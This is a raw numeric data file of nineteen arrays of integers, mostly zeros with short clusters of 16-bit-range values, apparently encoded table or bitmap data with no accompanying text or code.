[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 46980, 32321, 39398, 30470, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 43264, 21056, 37520, 16676, 681, 14946],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 7812, 38209, 1766, 62470, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 10752, 39552, 29344, 16808, 52778, 61709],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 34180, 44097, 29670, 28934, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 65280, 6080, 63472, 62844, 49663, 3540],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 60548, 49985, 57574, 60934, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 11776, 56192, 53984, 16824, 51687],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 21380, 55873, 19942, 27398, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 9472, 4416, 35408, 40212, 31781, 33334],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 47748, 61761, 47846, 59398, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 22016, 1408, 13664, 43096, 40022, 62065],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 8580, 2113, 10214, 25862, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 39680, 40640, 8624, 28140, 3739, 52232],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 34948, 8001, 38118, 57862, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 256, 14400, 45072, 27012, 55595],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 61316, 13889, 486, 24326, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 57600, 8256, 54800, 28164, 51937, 39882],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 22148, 19777, 28390, 56326, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 49664, 128, 56352, 59400, 47298, 6293],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 48516, 25665, 56294, 22790, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 30464, 62912, 65392, 62300, 54903, 15868],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 9348, 31553, 18662, 54790, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 22784, 56896, 64912, 5935],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 35716, 37441, 46566, 21254, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 56576, 32576, 13776, 9204, 35549, 47902],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 62084, 43329, 8934, 53254, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 28160, 35712, 9952, 12472, 61294, 42873],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 22916, 49217, 36838, 19718, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 37632, 7360, 20784, 30156, 54675, 63408],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 49284, 55105, 64742, 51718, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 55040, 64960, 3440, 27100, 42995],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 10116, 60993, 27110, 18182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 6400, 11840, 27024, 12004, 38937, 54322],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 36484, 1345, 55014, 50182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 23040, 42624, 54688, 45672, 19546, 41757],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 62852, 7233, 17382, 16646, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 61184, 5056, 55024, 58684, 2031, 19748],
